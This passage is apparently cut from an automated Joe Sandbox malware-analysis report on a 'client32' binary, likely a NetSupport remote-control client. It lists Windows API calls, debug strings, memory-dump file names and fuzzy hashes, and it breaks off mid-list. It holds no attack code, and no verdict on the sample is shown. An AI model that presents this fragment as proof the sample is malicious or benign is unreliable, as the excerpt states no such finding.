                                                                                        • Sleep.KERNEL32(00000064,?,?,110F5EF9), ref: 110F38BF
                                                                                        • SetNamedPipeHandleState.KERNEL32(00000000,00000003,00000000,00000000,?,?,110F5EF9), ref: 110F38E2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: NamedPipe$HandleState$ConnectErrorLastSleep
                                                                                        • String ID:
                                                                                        • API String ID: 218362120-0
                                                                                        • Opcode ID: cde699dce36d0e924c4729a61095b99d3c00098eb9d024938d5ff4b1e205ef84
                                                                                        • Instruction ID: 6745868c0ac614beeabaf6f2984982edca353f63092262b155279210f934f0d8
                                                                                        • Opcode Fuzzy Hash: cde699dce36d0e924c4729a61095b99d3c00098eb9d024938d5ff4b1e205ef84
                                                                                        • Instruction Fuzzy Hash: FE01A430A8431EBBF704CFD4CD86BA9B7ACEB48715F2040A9FD14D6580D7755D1187A1
                                                                                        APIs
                                                                                        • __getptd.LIBCMT ref: 11171312
                                                                                          • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                          • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                                        • __getptd.LIBCMT ref: 11171329
                                                                                        • __amsg_exit.LIBCMT ref: 11171337
                                                                                        • __lock.LIBCMT ref: 11171347
                                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 1117135B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                        • String ID:
                                                                                        • API String ID: 938513278-0
                                                                                        • Opcode ID: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                                        • Instruction ID: 9cb08520484339131e966c5afe67267813abc49f95b778b0e1eea255b6adbda5
                                                                                        • Opcode Fuzzy Hash: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                                        • Instruction Fuzzy Hash: 67F0243AD04322DAE7119BB88801B5CF7A16F0073CF110249D814A77C0CFA47810CB5B
                                                                                        APIs
                                                                                          • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                          • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                          • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                          • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                          • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                          • Part of subcall function 11145410: GetSystemMetrics.USER32(0000005E,00000000,00000000,?,110CCCA0,00000000,110314FA,00000104), ref: 1114542A
                                                                                          • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC387
                                                                                          • Part of subcall function 110CC360: GetWindowRect.USER32(00000000), ref: 110CC38A
                                                                                          • Part of subcall function 110CC360: MapWindowPoints.USER32 ref: 110CC39C
                                                                                          • Part of subcall function 110CC360: MapDialogRect.USER32(00000000,?), ref: 110CC3C8
                                                                                          • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC401
                                                                                          • Part of subcall function 110CC360: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000010), ref: 110CC41C
                                                                                          • Part of subcall function 110183B0: GetSystemMetrics.USER32(0000005E), ref: 110183BF
                                                                                          • Part of subcall function 110183B0: GetSystemMetrics.USER32(00002003), ref: 110183DF
                                                                                        • std::exception::exception.LIBCMT ref: 11053483
                                                                                        • __CxxThrowException@8.LIBCMT ref: 11053498
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMetricsRectSystem$DialogException@8ObjectPointsShowTextThrowstd::exception::exception
                                                                                        • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                        • API String ID: 2181554437-3415836059
                                                                                        • Opcode ID: 1accb0bbb03bc77863436f13e3d15f929dc8c171c4ae25107a4f7bd902e08966
                                                                                        • Instruction ID: 43705d0265472f43c13063854f38501adaeacc0369148bb5472ef3ca99b46591
                                                                                        • Opcode Fuzzy Hash: 1accb0bbb03bc77863436f13e3d15f929dc8c171c4ae25107a4f7bd902e08966
                                                                                        • Instruction Fuzzy Hash: 1E519375E00209AFDB45DF94CD81EEEF7B9FF44308F108569E5066B281EB35AA05CB91
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$VisibleWindow
                                                                                        • String ID: %d,%d,%d,%d,%d,%d
                                                                                        • API String ID: 1671172596-1913222166
                                                                                        • Opcode ID: eef60ca5cad2aaf85d34c80ad1b5db7222e23259f3c31fef37829276a8a7ef1d
                                                                                        • Instruction ID: 6217bdbd462a20bf08026d4811e8c1ad77ae889b3603263953c56721c7b36dbb
                                                                                        • Opcode Fuzzy Hash: eef60ca5cad2aaf85d34c80ad1b5db7222e23259f3c31fef37829276a8a7ef1d
                                                                                        • Instruction Fuzzy Hash: AD519F74700215AFD710DB68CC90FAAB7F9BF88704F108699E65A9B391DB70ED45CBA0
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 110670A8
                                                                                        • GetTickCount.KERNEL32(General,TicklePeriod,00000012,00000000), ref: 110671F0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick
                                                                                        • String ID: General$TicklePeriod
                                                                                        • API String ID: 536389180-1546705386
                                                                                        • Opcode ID: 1e3c80d65e4a9275dada7a8160690c7bfb2ffa6c600ae6bf0c338216ce86f976
                                                                                        • Instruction ID: df9d0f281d17993452c850789e07539b87313039e6a264bd0b80c81d914ed6ef
                                                                                        • Opcode Fuzzy Hash: 1e3c80d65e4a9275dada7a8160690c7bfb2ffa6c600ae6bf0c338216ce86f976
                                                                                        • Instruction Fuzzy Hash: FE516234A00705DFE764CF68C994B9AB7E9FB44300F1085AEE55A8B381EB71BA45CB91
                                                                                        APIs
                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 11019C2A
                                                                                        Strings
                                                                                        • ..\NsAppSystem\NsAsApplicationObjects\Client32\NsAsMetroClientManager.cpp, xrefs: 11019C35
                                                                                        • !"NOT IMPLEMENTED", xrefs: 11019C3A
                                                                                        • vector<T> too long, xrefs: 11019C25
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Xinvalid_argumentstd::_
                                                                                        • String ID: !"NOT IMPLEMENTED"$..\NsAppSystem\NsAsApplicationObjects\Client32\NsAsMetroClientManager.cpp$vector<T> too long
                                                                                        • API String ID: 909987262-1355409292
                                                                                        • Opcode ID: defab152e2a2a034fa8a3a53941102f1edd972b6cf5954f827a95ad610d094cb
                                                                                        • Instruction ID: fc840e911b847fc855133020e95c2a3ba51fe97c4fb46b87c4a8b304b90ffd87
                                                                                        • Opcode Fuzzy Hash: defab152e2a2a034fa8a3a53941102f1edd972b6cf5954f827a95ad610d094cb
                                                                                        • Instruction Fuzzy Hash: DA41E875F002068FCB1CCE68CDD05AEB7E6F784219B648A3ED927C7688F635E9008751
                                                                                        APIs
                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 11077511
                                                                                        • CopyRect.USER32(?,00000004), ref: 1107753F
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110774F9
                                                                                        • m_hWnd, xrefs: 110774FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CopyErrorExitLastLongMessageProcessRectWindowwsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 2755825785-2830328467
                                                                                        • Opcode ID: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
                                                                                        • Instruction ID: 59158522108a3a71f1e5bb0466e943617169e98ae829cc3baa7e2fe2b27ff523
                                                                                        • Opcode Fuzzy Hash: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
                                                                                        • Instruction Fuzzy Hash: 5841C271E00B46DBCB15CF68C9C8B6EB7F1EF44344F10856AD8569B644EBB0E940CB98
                                                                                        Strings
                                                                                        • Exit Win10 Start screen (%s), xrefs: 11031BA6
                                                                                        • Error. ExitMetro code cannot init kbfilter, xrefs: 11031C39
                                                                                        • Error. WindowsD not generated, xrefs: 11031C52
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandle_memset$ClassCodeCursorExitFromNameObjectOpenPointProcessSingleVersionWaitWindow_strncpywsprintf
                                                                                        • String ID: Error. ExitMetro code cannot init kbfilter$Error. WindowsD not generated$Exit Win10 Start screen (%s)
                                                                                        • API String ID: 2171401249-3225996774
                                                                                        • Opcode ID: 64892938fa0b6c1ee6d66ac4cfd7e9802a1b46fe4b434297f23fe30ead13f557
                                                                                        • Instruction ID: fa832722e0390e9f8a25bf370b451ec2a36a1e68e963bc0416f7044736d9f8e9
                                                                                        • Opcode Fuzzy Hash: 64892938fa0b6c1ee6d66ac4cfd7e9802a1b46fe4b434297f23fe30ead13f557
                                                                                        • Instruction Fuzzy Hash: CD31297AD14219AFE715CFD49C417AEB7F8DB45619F0042AADC15937C0EB316500CBD1
                                                                                        APIs
                                                                                        • _memmove.LIBCMT ref: 110D1378
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                        • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                        • API String ID: 1528188558-323366856
                                                                                        • Opcode ID: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                                        • Instruction ID: ca0f400cc3ae87bce4a96c7d882a21a9a029a19775e55ac1937322abd3584148
                                                                                        • Opcode Fuzzy Hash: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                                        • Instruction Fuzzy Hash: 0C212639B007566BDB01CF99EC90F9AF3E5AFD1288F048469E99997701EE31F4058398
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 11063BBF
                                                                                          • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                          • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                        • _swscanf.LIBCMT ref: 11063C24
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _memset$_malloc_swscanf
                                                                                        • String ID: %d %d %d %d %d %d %d %d %d$Y}u
                                                                                        • API String ID: 226140750-1540900071
                                                                                        • Opcode ID: cdafe33eaccb420b0754e9fe0719c12dd03f167f19b4b7f606253dbf103d93b3
                                                                                        • Instruction ID: f29ba27cc2c913ad3b684a2f624221344e38d21cdf1a391e0ea5ddce6e1bd222
                                                                                        • Opcode Fuzzy Hash: cdafe33eaccb420b0754e9fe0719c12dd03f167f19b4b7f606253dbf103d93b3
                                                                                        • Instruction Fuzzy Hash: 8711BEB25006096BE321CF59CCC0EE7B7ECEF89B14F00491AF54A8B545D671F958C7A1
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,0000000E,?,?,?), ref: 11160E88
                                                                                          • Part of subcall function 11160D17: RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?), ref: 11160D4F
                                                                                          • Part of subcall function 11160D17: RegQueryValueExA.ADVAPI32 ref: 11160D90
                                                                                          • Part of subcall function 11160D17: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 11160DB4
                                                                                          • Part of subcall function 11160D17: RegCloseKey.ADVAPI32(?), ref: 11160DE1
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 11160E4A
                                                                                        • LoadLibraryA.KERNEL32(hhctrl.ocx), ref: 11160E60
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
